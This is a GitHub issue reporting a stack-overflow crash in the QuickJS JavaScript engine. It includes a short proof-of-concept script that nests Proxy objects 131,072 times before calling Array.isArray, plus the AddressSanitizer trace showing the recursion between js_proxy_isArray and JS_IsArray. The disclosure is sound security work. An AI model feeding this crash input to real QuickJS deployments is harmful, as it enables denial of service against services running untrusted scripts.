Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

AddressSanitizer: stack-overflow #178

Open
Ye0nny opened this issue Apr 22, 2023 · 0 comments
Open

AddressSanitizer: stack-overflow #178

Ye0nny opened this issue Apr 22, 2023 · 0 comments

Comments

@Ye0nny
Copy link

Ye0nny commented Apr 22, 2023

QuickJS Version

Version : 2788d71

platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build

  • Address Sanitizer=On
  • Debug (and Release)

PoC

testcase

Array . isArray ( [ ] ) ; Array . isArray ( { } ) , Array . isArray ( null ) , Array . isArray ( 0 ) , Array . isArray ( 0.1 ) , Array . isArray ( " " ) , Array . isArray ( void 0 ) , Array . isArray ( new Proxy ( [ ] , { } ) ) , Array . isArray ( new Proxy ( { } , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( [ ] , { } ) , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( { } , { } ) , { } ) ) ; for ( var r = new Proxy ( [ ] , { } ) , y = 0 ; y < 131072 ; y ++ ) r = new Proxy ( r , { } ) ; Array . isArray ( r ) , RangeError ;

// poc.js
for (var r = new Proxy ([],{}) , y = 0 ; y < 131072 ; y ++ ) 
    r = new Proxy (r, {}); 
Array . isArray (r);

Execution steps & Output

The js_proxy_isArray() function and the JS_IsArray() function are calling each other recursively.
infinite loop occurs here.

$ ./qjs poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2347865==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcfb766fd8 (pc 0x557e466f5b94 bp 0x7ffcfb767110 sp 0x7ffcfb766fd8 T0)
    #0 0x557e466f5b93 in js_proxy_isArray ./quickjs/quickjs.c:45242
    #1 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #2 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #3 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #4 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #5 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    ...
    #491 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #492 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #493 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #494 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #495 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #496 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250

SUMMARY: AddressSanitizer: stack-overflow ./quickjs/quickjs.c:45242 in js_proxy_isArray
==2347865==ABORTING

Credits: @Ye0nny, @EJueon of the seclab-yonsei.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant